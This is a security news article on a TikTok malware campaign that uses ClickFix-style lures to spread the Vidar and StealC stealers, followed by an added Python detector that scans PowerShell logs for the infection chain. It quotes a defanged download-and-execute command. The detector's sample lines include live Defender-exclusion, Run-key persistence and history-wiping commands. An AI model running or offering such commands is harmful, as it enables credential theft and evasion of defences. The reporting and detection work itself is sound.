Cybercriminals have evolved their malware distribution tactics by weaponizing TikTok’s algorithm and exploiting user trust through sophisticated AI-generated videos that masquerade as legitimate software activation tutorials.
Cybercriminals now exploit TikTok’s algorithm with AI-generated fake tutorials to distribute malware through deceptive software activation guides.
Trend Micro researchers identified this campaign as a significant shift from traditional browser-based malware delivery methods, with threat actors creating deceptively professional content that mimics authentic activation walkthroughs for popular applications including Windows, Microsoft Office, CapCut, and Spotify. The malicious videos were hosted across multiple accounts, including @gitallowed and @sysglow.wow, which have since been removed from the platform.
The campaign employs “ClickFix” social engineering tactics, utilizing fake error messages and CAPTCHA prompts to convince users to execute dangerous PowerShell commands. Victims are instructed to open PowerShell and run specific commands such as “iex (irm hxxps://allaivo[.]me/spotify),” which initiates a complex infection chain designed to deploy either Vidar or StealC information stealers onto their systems.
Once executed, the malicious PowerShell scripts create hidden directories within the APPDATA and LOCALAPPDATA folders, then exclude those locations from Windows Defender scans to evade detection. The malware establishes persistence by modifying registry keys so that its scripts run automatically at system startup, while scrubbing forensic footprints to delay identification by security solutions. Users who suspect infection should immediately disconnect compromised devices from their networks to prevent further unauthorized access.
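The infection chain described above leaves a recognisable sequence in PowerShell Script Block Logging (Event ID 4104): a download cradle, a Defender exclusion, a hidden staging directory under APPDATA/LOCALAPPDATA, a Run-key entry, and history clean-up. The following is an added detection example written for this article, not code from Trend Micro or from the campaign itself; the sample log lines, the indicator weights and the verdict thresholds are all constructed for illustration.

```python
import re

# Constructed sample script-block log lines, modelled on the chain described in the
# article. They are illustrative only and are not real telemetry.
SAMPLE_LOGS = [
    'iex (irm hxxps://allaivo[.]me/spotify)',
    'Add-MpPreference -ExclusionPath "$env:APPDATA\\Spotify"',
    'New-Item -ItemType Directory -Path "$env:LOCALAPPDATA\\svc" | ForEach-Object { $_.Attributes = "Hidden" }',
    'Set-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" '
    '-Name Updater -Value "powershell -w hidden -File $env:LOCALAPPDATA\\svc\\run.ps1"',
    'Get-ChildItem -Path C:\\Users\\alice\\Documents',
    'Clear-History; Remove-Item (Get-PSReadlineOption).HistorySavePath',
]

# (name, weight, pattern). Weights are an assumption for this example: actions that
# directly execute remote code, disable defences or persist score higher than staging.
INDICATORS = [
    ("download_cradle", 3, re.compile(
        r"\b(iex|invoke-expression)\b.*\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b",
        re.IGNORECASE)),
    ("defender_exclusion", 3, re.compile(
        r"add-mppreference\s+-exclusion(path|process|extension)", re.IGNORECASE)),
    ("run_key_persistence", 3, re.compile(
        r"(set-itemproperty|new-itemproperty|reg(\.exe)?\s+add).*currentversion\\+run\b",
        re.IGNORECASE)),
    ("hidden_directory", 1, re.compile(
        r"(attrib\s+\+h\b|attributes\s*=\s*['\"]?hidden|\[io\.fileattributes\]::hidden)",
        re.IGNORECASE)),
    ("appdata_staging", 1, re.compile(
        r"(\$env:(local)?appdata\b|%(local)?appdata%)", re.IGNORECASE)),
    ("history_scrub", 2, re.compile(
        r"(clear-history|historysavepath|clear-eventlog|wevtutil\s+cl\b)", re.IGNORECASE)),
]


def match_indicators(script_block):
    """Return the names of every indicator that fires on a single script block."""
    return [name for name, _, rx in INDICATORS if rx.search(script_block)]


def score_session(script_blocks):
    """Aggregate indicator hits across the script blocks of one session.

    Verdict rule (an assumption for this example): a download cradle combined with
    a Defender exclusion or Run-key persistence is a probable ClickFix-style chain;
    any other session scoring 3 or more is flagged as suspicious for analyst review.
    """
    weights = {name: w for name, w, _ in INDICATORS}
    hits = {}
    for block in script_blocks:
        for name in match_indicators(block):
            hits[name] = hits.get(name, 0) + 1
    score = sum(weights[n] * c for n, c in hits.items())
    if "download_cradle" in hits and (
            "defender_exclusion" in hits or "run_key_persistence" in hits):
        verdict = "probable_clickfix_chain"
    elif score >= 3:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"score": score, "hits": hits, "verdict": verdict}


if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(f"{match_indicators(line)!r:45} {line[:60]}")
    print(score_session(SAMPLE_LOGS))
```

Running the block over the constructed session reports every stage of the chain and a `probable_clickfix_chain` verdict, while the lone benign `Get-ChildItem` line scores nothing. The indicators are deliberately generic (cmdlet names rather than the campaign's domain) so the same rule keeps working when the delivery URL changes; in production the input would be the `ScriptBlockText` field of Event ID 4104 records grouped by session.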
Both Vidar and StealC possess extensive data theft capabilities, targeting browser credentials, cryptocurrency wallets, and session tokens to facilitate account takeovers. Vidar specifically captures desktop screenshots while collecting login credentials, cookies, credit card information, and crypto wallet data from infected devices.
The malware’s command-and-control infrastructure utilizes legitimate platforms including Telegram channels and Steam Community profiles to conceal malicious communications through Dead Drop Resolvers that mask actual IP addresses. These threats have expanded beyond traditional piracy sites to target gaming platforms and AI tools, making detection increasingly complex for law enforcement agencies.
This TikTok campaign represents part of a broader trend where cybercriminals exploit AI-generated content across social media platforms. Similar operations have been observed on Facebook, where threat actors promote fake AI-powered tools and cracked software through well-designed posts that eventually distribute identical malware families through fraudulent download portals.
Security experts recommend extreme caution when encountering social media content requesting PowerShell command execution, emphasizing that legitimate software activation procedures never require users to run script commands from untrusted sources or social media platforms.